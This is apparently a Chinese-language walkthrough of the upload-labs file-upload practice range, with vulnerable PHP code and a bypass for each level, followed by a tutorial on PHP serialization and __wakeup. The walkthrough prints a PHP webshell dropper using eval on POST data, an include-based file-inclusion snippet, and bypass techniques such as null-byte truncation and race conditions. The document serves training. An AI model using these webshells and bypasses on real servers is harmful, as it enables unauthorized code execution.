前十道题连接

Pass-11

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错！';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif类型文件！";
    }
}

分析

这次是将文件名.后截取，和白名单匹配，看似没有什么问题，不过可以上传文件路径。通过把shell.php上传到路径中截断的方式可以得到上传web shell的目的。因为路径是要与文件名拼接的，让文件在存放的时候读取到拼接后被截断的位置就停止（字符串结束符0，在url编码后为%00）。

在url中%00表示ascll码中的0 ，而ascii中0作为特殊字符保留，表示字符串结束，所以当url中出现%00时就会认为读取已结束

• upfiles/?filename=test.txt  上传的是test.txt
• upfiles/?filename=shell.php%00test.txt 上传的是shell.php

题解

上传成功！

Pass-12

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif类型文件！";
    }
}

分析

这次上传的路径是post形式，可以通过00截断。0x开头表示16进制，0在十六进制中是00, 0x00就是%00解码成的16进制。

题解

把上传路径换成shell.php，注意p后面有一个空格（方便一会识别）

进入Hex模式，修改16进制，这里左侧16进制与右侧文本是按行对应的。找到刚刚更改的shell.php。在php的十六进制是70 68 70。点击后面的20。右键插入字节（默认是00）

上传成功！

Pass-13 14 15 16

前三道题都是图片，只要构造好图片马上传连接即可

16题使用了二次渲染，图片马制作方法。

图片马是把一句话木马写入到图片内，再通过文件上传漏洞将图片解析成php执行。

这里我构造好了 png jpg gif 格式的图片马 点击下载 （不含16题）

png 的shell是 shell jpg和gif的shell 是 1

此外，要利用文件上传漏洞，在upload文件夹内还要有这段代码

<?php
$file=$_GET[page];
include($file);
?>

我们进行连接时，通过给page传参数，即可连接

Pass-17

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件！";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错！';
    }
}

分析

这次使用的仍然是白名单，但不一样的是。这次是先上传文件到文件夹，如果不符合白名单的条件再调用unlink删除这个文件。

可以使用条件竞争的方法，不停的向服务器上传webshell。当服务器没来得及调用unlink函数时访问。这个webshell是特殊的，调用它会再生成一个webshell从而在服务器里保存。

in_shell.php文件：

<?php
phpinfo();
@eval(file_put_contents("shell.php","<?php @eval(\$_POST[shell]);?>"));
?>

调用后会生成 shell.php

题解

先上传源文件，使用bp抓包。

使用intruder入侵

无限上传

线程100

在启动之前，去浏览器输入访问的文件（提前上传一个png查看返回路径）

启动intruder，在浏览器不停刷新，注意这里要换一个不被bp监听的浏览器。当有phpinfo界面一闪而过时，说明已经上传成功了。去网站目录也可以看见。

菜刀连接即可。

Pass-18

index.php代码

//index.php
$is_upload = false;
$msg = null;
if (isset($_POST['submit']))
{
    require_once("./myupload.php");
    $imgFileName =time();
    $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
    $status_code = $u->upload(UPLOAD_PATH);
    switch ($status_code) {
        case 1:
            $is_upload = true;
            $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
            break;
        case 2:
            $msg = '文件已经被上传，但没有重命名。';
            break; 
        case -1:
            $msg = '这个文件不能上传到服务器的临时文件存储目录。';
            break; 
        case -2:
            $msg = '上传失败，上传目录不可写。';
            break; 
        case -3:
            $msg = '上传失败，无法上传该类型文件。';
            break; 
        case -4:
            $msg = '上传失败，上传的文件过大。';
            break; 
        case -5:
            $msg = '上传失败，服务器已经存在相同名称文件。';
            break; 
        case -6:
            $msg = '文件无法上传，文件不能复制到目标目录。';
            break;      
        default:
            $msg = '未知错误！';
            break;
    }
}

//myupload.php
class MyUpload{
......
......
...... 
  var $cls_arr_ext_accepted = array(
      ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
      ".html", ".xml", ".tiff", ".jpeg", ".png" );

......
......
......  
  /** upload()
   **
   ** Method to upload the file.
   ** This is the only method to call outside the class.
   ** @para String name of directory we upload to
   ** @returns void
  **/
  function upload( $dir ){
    
    $ret = $this->isUploadedFile();
    
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->setDir( $dir );
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkExtension();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkSize();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }
    
    // if flag to check if the file exists is set to 1
    
    if( $this->cls_file_exists == 1 ){
      
      $ret = $this->checkFileExists();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }

    // if we are here, we are ready to move the file to destination

    $ret = $this->move();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }

    // check if we need to rename the file

    if( $this->cls_rename_file == 1 ){
      $ret = $this->renameFile();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }
    
    // if we are here, everything worked as planned :)

    return $this->resultUpload( "SUCCESS" );
  
  }
......
......
...... 
};


Copyright @ 2018 ~ 2020 by c0ny1

分析

白名单中存在.7z这个后缀名，apache不能解析，因此可以利用apache的解析漏洞，命名文件为1.php.7z，这样，apche从右往左解析时，遇到.7z不认识，就把这个文件当作.php来解析。

这道首先会检测文件名.结尾后是不是白名单，如果是的话就进行move。然后再进行重命名（把.之前的去掉），我们可以利用这个间隙不断地上传shell.php.7z文件，就可以进行资源竞争。

这里与上一关方法相同，发现了上传返回不一样的文件。

去看文件果然上传成功，注意这里的前缀是因为uploadlabs的bug，应该在upload目录下的，现在没有分开，不过意思已经表达到了。当我们连接这个文件时，

搞定！

继续更新~

UPload-labs简介

upload-labs是一个使用php语言编写的，专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关，每一关都包含着不同上传方式。

项目地址：Upload-labs

题目都是文件上传，能传进去一句话木马用蚁剑菜刀连上就可以。

Pass-01

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    //定义允许上传的文件类型
    var allow_ext = ".jpg|.png|.gif";
    //提取上传文件的类型
    var ext_name = file.substring(file.lastIndexOf("."));
    //判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传，请上传" + allow_ext + "类型的文件,当前文件类型为：" + ext_name;
        alert(errMsg);
        return false;
    }
}

分析

var ext_name截取文件名最后一个.和之后的字母。

allow_ext.indexOf加上 | 与allow_ext中的条件匹配。文件只能是jpg，png格式。

解法1：

选择.png一句话木马上传，用BP改成php文件即可。

上传成功，回显了上传的图片，右键复制图片路径用蚁剑连接。

解法2：

点击一下上传发现前端报错，可以直接前端绕过。

在前端修改js代码即可，在调试器中找到这段函数复制到控制台。

添加php类型后运行，同样可以上传成功。需要注意的是，js的修改是以函数为单位的，新修改的函数会覆盖掉旧函数。

Pass-02

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '文件类型不正确，请重新上传！';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建！';
    }
}

分析

这次判断的是文件类型，只允许png和gif格式的图片。可以上传php格式的木马，用BP更改文件类型为image/png即可。

题解

上传成功

Pass-03

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

分析

第三题又是一个新类型的题：黑名单限制文件上传，不允许上 传.asp|.aspx|.php|.jsp后缀文件。那么要如何绕过呢？
这里说下关于Apache的一些知识：

• Apache的解析顺序是从右到左开始解析文件后缀的，如果最右侧扩展名不可识别，就继续往左判断。直到遇到可以解析的文件后缀为止
• 可以上传例如php3, phtml后缀的文件绕过，前提是Apache的httpd.conf中配置有如下代码:
  AddType application/x-httpd-php .php .php3 .phtml

服务器会将.php3, .phtml后缀的文件当成.php解析。

也就是说，可以抓包更改成php3或者phtml后缀即可上传。

题解

上传成功！

Pass-04

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

分析

这道题很绝，禁用了大部分文件格式和常见的绕过方式。不过—没禁用.htaccess格式。

.htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过.htaccess文件，可以实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能IIS平台上不存在该文件，该文件默认开启，启用和关闭在httpd.conf文件中配置。

上传一个.htaccess内容如下的文件

SetHandler application/x-httpd-php      

注意，在htaccess文件中这句话没有分号，建议直接建一个没有文件名的htaccess文件，或者上传的时候改包成无文件名。

这样所有文件都会解析为php，然后再上传图片马就可以解析。

连接成功！

Pass-05

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件类型不允许上传！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

分析

和第四题一样，除了禁用了htaccess文件。仔细观察还可以发现，这道题没有禁用大小写，这句话被删除了：

$file_ext = strtolower($file_ext); //转换为小写

也就是说，当输入大写的php时，文件依旧可以执行。但检测不出来。

题解

上传成功！

注意改成pHp不行，pHp在黑名单里（仔细看看）

Pass-06

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file,$img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

分析

这道比上面一题少了一行

  $file_ext = trim($file_ext); //首尾去空

也就是说，在php的末尾加上空格就可以绕过。

题解

上传成功！

Pass-06

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件类型不允许上传！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

分析

这道题删除了这一句

$file_name = deldot($file_name);//删除文件名末尾的点

也就是不会先删除文件名末尾的点了，那么

 $file_ext = strrchr($file_name, '.');

只会截取最后一个.后的内容，也就是说，构造成shell.php.的形式就可以了。

题解

上传成功！

需要注意的是，这道题之所以可以这样，还有一个重要的因素是存储文件名变成了这句话

$img_path = UPLOAD_PATH.'/'.$file_name;

存储的是源文件名，而上传后系统会自动去除拓展名中的.

而如果存储名字是提取后的，这种方法就不能用了

 $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;    

Pass-08

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件类型不允许上传！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

分析

这道题少了这一句

$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA

在php+windows的情况下：如果文件名+::$DATA,::$DATA之后的数据当成文件流处理,不会检测后缀名 且保持”::$DATA“之前的文件名。（原因的话不清楚）所以这题的绕过方法为：在文件后缀加::$DATA抓包，加上后缀就行了。

题解

上传成功！

Pass-09

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件类型不允许上传！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

分析

可以看到上传的是经过去点处理的文件名

 $img_path = UPLOAD_PATH.'/'.$file_name;

那就可以构造.php. .的形式，$file_name经过处理后是.php. 可以正常被读取。而接下来对$file_ext的处理是截取倒数第二个.后的内容，和黑名单进行匹配，自然就可以绕过了。

题解

上传成功！

Pass-10

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = str_ireplace($deny_ext,"", $file_name);
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = UPLOAD_PATH.'/'.$file_name;        
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = '上传出错！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

分析

这次是使用了str_ireplace

会检测黑名单中的字符串，用空格替代。不过这个只运行一次，也就是只能检测出php而检测不出pphphp，第一次把中间的php去掉，合成后还是php。

题解

上传成功！

后十道题会继续更新：连接

总结

这十道题的上传方法有：

1. 前端绕过
2. 文件类型绕过
3. 特殊可解析后缀绕过
4. .htaccess绕过
5. 大小写绕过
6. 空格绕过
7. 点绕过
8. ::$DATA绕过
9. 配合解析绕过 //.php. .
10. 双后缀名绕过

参考 ：未完成的歌

_wakeup漏洞经常用于反序列化操作，先看下序列化的详细介绍，之后再讲解一道反序列化题。

序列化

序列化格式

在PHP中，序列化用于存储或传递 PHP 的值的过程中，同时不丢失其类型和结构。

序列化函数原型如下：

string serialize ( mixed $value )

先看下面的例子：

class CC {
	public $data;
	private $pass;

	public function __construct($data, $pass)
	{
		$this->data = $data;
		$this->pass = $pass;
	}
}
$number = 34;
$str = 'uusama';
$bool = true;
$null = NULL;
$arr = array('a' => 1, 'b' => 2);
$cc = new CC('uu', true);

var_dump(serialize($number));
var_dump(serialize($str));
var_dump(serialize($bool));
var_dump(serialize($null));
var_dump(serialize($arr));
var_dump(serialize($cc));

输出结果为：

string(5) "i:34;"
string(13) "s:6:"uusama";"
string(4) "b:1;"
string(2) "N;"
string(30) "a:2:{s:1:"a";i:1;s:1:"b";i:2;}"
string(52) "O:2:"CC":2:{s:4:"data";s:2:"uu";s:8:" CC pass";b:1;}"

所以序列化对于不同类型得到的字符串格式为：

• String : s:size:value;
• Integer : i:value;
• Boolean : b:value;(保存1或0)
• Null : N;
• Array : a:size:{key definition;value definition;(repeated per element)}
• Object : O:strlen(object name):object name:object size:{s:strlen(property name):property name:property definition;(repeated per property)}

序列化对象

从上面的例子中我们可以看出序列化对象的时候，只会保存属性值。

• 那么对象中的常量会不会保存呢？
• 如果是继承，父类的变量会不会保存呢

class CB {
	public $CB_data = 'cb';
}

class CC extends CB{
	const SECOND = 60;

	public $data;
	private $pass;

	public function __construct($data, $pass)
	{
		$this->data = $data;
		$this->pass = $pass;
	}

	public function setPass($pass)
	{
		$this->pass = $pass;
	}
}
$cc = new CC('uu', true);

var_dump(serialize($cc));

输出结果为：

string(75) "O:2:"CC":3:{s:4:"data";s:2:"uu";s:8:" CC pass";b:1;s:7:"CB_data";s:2:"cb";}"

显然，序列化对象时，不会保存常量的值。对于父类中的变量，则会保留。

对象序列化自定义

在序列化对象的时候，对于对象中的一些敏感属性，我们不需要保存，这又该如何处理呢？

当调用serialize()函数序列化对象时，该函数会检查类中是否存在一个魔术方法__sleep()。如果存在，该方法会先被调用，然后才执行序列化操作。可以通过重载这个方法，从而自定义序列化行为。该方法原型如下：

public array __sleep ( void )

• 该方法返回一个包含对象中所有应被序列化的变量名称的数组
• 该方法未返回任何内容，则 NULL 被序列化，并产生一个E_NOTICE级别的错误
• __sleep()不能返回父类的私有成员的名字。这样做会产生一个E_NOTICE级别的错误。这时只能用Serializable接口来替代。
• 常用于保存那些大对象时的清理工作，避免保存过多冗余数据

看下面的例子：

class User{
	const SITE = 'uusama';

	public $username;
	public $nickname;
	private $password;

	public function __construct($username, $nickname, $password)
	{
		$this->username = $username;
		$this->nickname = $nickname;
		$this->password = $password;
	}

	// 重载序列化调用的方法
	public function __sleep()
	{
		// 返回需要序列化的变量名，过滤掉password变量
		return array('username', 'nickname');
	}
}
$user = new User('uusama', 'uu', '123456');
var_dump(serialize($user));

返回结果如下，显然序列化的时候忽略了 password 字段的值。

string(67) "O:4:"User":2:{s:8:"username";s:6:"uusama";s:8:"nickname";s:2:"uu";}"

序列化对象存储

通过上面的介绍，我们可以把一个复制的对象或者数据序列化成一个序列字符串，保存值的同事还保存了他们的结构。

我们可以把序列化之后的值保存起来，存在文件或者缓存里面。不推荐存在数据库里面，可读性查，而且不便于迁移维护，不便于查询。

$user = new User('uusama', 'uu', '123456');
$ser = serialize($user);
// 保存在本地
file_put_contents('user.ser', $ser);

反序列化

使用方法

通过上面的讲解，我们可以将对象序列化为字符串并保存起来，那么如何把这些序列化后的字符串恢复成原样呢？PHP提供了反序列函数：

mixed unserialize ( string $str )

unserialize()反序列化函数用于将单一的已序列化的变量转换回 PHP 的值。

• 如果传递的字符串不可解序列化，则返回 FALSE，并产生一个E_NOTICE
• 返回的是转换之后的值，可为integer``float、string、array或object
• 若被反序列化的变量是一个对象，在成功重新构造对象之后，PHP会自动地试图去调用__wakeup()成员函数（如果存在的话）

看下面的例子：

class User{
	const SITE = 'uusama';

	public $username;
	public $nickname;
	private $password;
	private $order;

	public function __construct($username, $nickname, $password)
	{
		$this->username = $username;
		$this->nickname = $nickname;
		$this->password = $password;
	}

	// 定义反序列化后调用的方法
	public function __wakeup()
	{
		$this->password = $this->username;
	}
}
$user_ser = 'O:4:"User":2:{s:8:"username";s:6:"uusama";s:8:"nickname";s:2:"uu";}';
var_dump(unserialize($user_ser));

输出结果为：

object(User)#1 (4) {
  ["username"]=>
  string(6) "uusama"
  ["nickname"]=>
  string(2) "uu"
  ["password":"User":private]=>
  string(6) "uusama"
  ["order":"User":private]=>
  NULL
}

可以得出以下结论：

• __wakeup()函数在对象被构建以后执行，所以$this->username的值不为空
• 反序列化时，会尽量将变量值进行匹配并复制给序列化后的对象

未定义类的处理

在上面的例子中，我们在调用反序列化函数unserialize()之前，提前定义了User类，如果我们没有定义会怎么样呢？

$user_ser = 'O:4:"User":2:{s:8:"username";s:6:"uusama";s:8:"nickname";s:2:"uu";}';
var_dump(unserialize($user_ser));

这个例子中，我们没有定义任何的User类，反序列化正常执行，并没有报错，得到的结果如下：

object(__PHP_Incomplete_Class)#1 (3) {
  ["__PHP_Incomplete_Class_Name"]=>
  string(4) "User"
  ["username"]=>
  string(6) "uusama"
  ["nickname"]=>
  string(2) "uu"
}

注意对比之前定义了User类的结果，这儿反序列化得到的对象是__PHP_Incomplete_Class，并指定了未定义类的类名。

如果这个时候我们去使用这个反序列化后的不明对象，则会抛出E_NOTICE。这么看着不能用也不是办法，那么如何处理呢？有两种方案。

• 定义__autoload()等函数，指定发现未定义类时加载类的定义文件
• 可通过 php.ini、ini_set() 或 .htaccess 定义unserialize_callback_func。每次实例化一个未定义类时它都会被调用

以上两种方案的实现如下：

// unserialize_callback_func 从 PHP 4.2.0 起可用
ini_set('unserialize_callback_func', 'mycallback'); // 设置您的回调函数
function mycallback($classname) 
{
   // 只需包含含有类定义的文件
   // $classname 指出需要的是哪一个类
}


// 建议使用下面的函数，代替__autoload()
spl_autoload_register(function ($class_name) {
	// 动态加载未定义类的定义文件
    require_once $class_name . '.php';
});

PHP预定义序列化接口Serializable

还记得上面在将序列化过程中遇到的：无法在__sleep()方法中返回父类对象的问题吗，方法就是实现序列化接口Serializable。

该接口的原型如下：

Serializable {
	abstract public string serialize ( void )
	abstract public mixed unserialize ( string $serialized )
}

需要注意的是，如果定义的类实现了Serializable接口，那么序列化和反序列化的时候，PHP就不会再去调用__sleep()方法和__wakeup()方法。

class CB implements Serializable{
	public $CB_data = '';
	private $CB_password = 'ttt';

	public function setCBPassword($password)
	{
		$this->CB_password = $password;
	}

	public function serialize()
	{
		echo __METHOD__ . "\n";
		return serialize($this->CB_password);
	}

	public function unserialize($serialized)
	{
		echo __METHOD__ . "\n";
	}
}

class CC extends CB {
	const SECOND = 60;

	public $data;
	private $pass;

	public function __construct($data, $pass)
	{
		$this->data = $data;
		$this->pass = $pass;
	}

	public function __sleep()
	{
		// 输出调用了该方法名
		echo __METHOD__ . "\n";
	}

	public function __wakeup()
	{
		// 输出调用了该方法名
		echo __METHOD__ . "\n";
	}
}
$cc = new CC('uu', true);
$ser = serialize($cc);
var_dump($ser);
$un_cc = unserialize($ser);
var_dump($un_cc);

运行结果为：

CB::serialize
string(24) "C:2:"CC":10:{s:3:"ttt";}"
CB::unserialize
object(CC)#2 (4) {
  ["data"]=>
  NULL
  ["pass":"CC":private]=>
  NULL
  ["CB_data"]=>
  string(0) ""
  ["CB_password":"CB":private]=>
  string(3) "ttt"
}

可以完全定义serialize()方法，该方法返回的值就是序列化后大括号内的值，只要保证自定义序列化和反序列化的规则一致即可。

题外话

在PHP应用中，序列化和反序列化一般用做缓存，比如session缓存，cookie等。

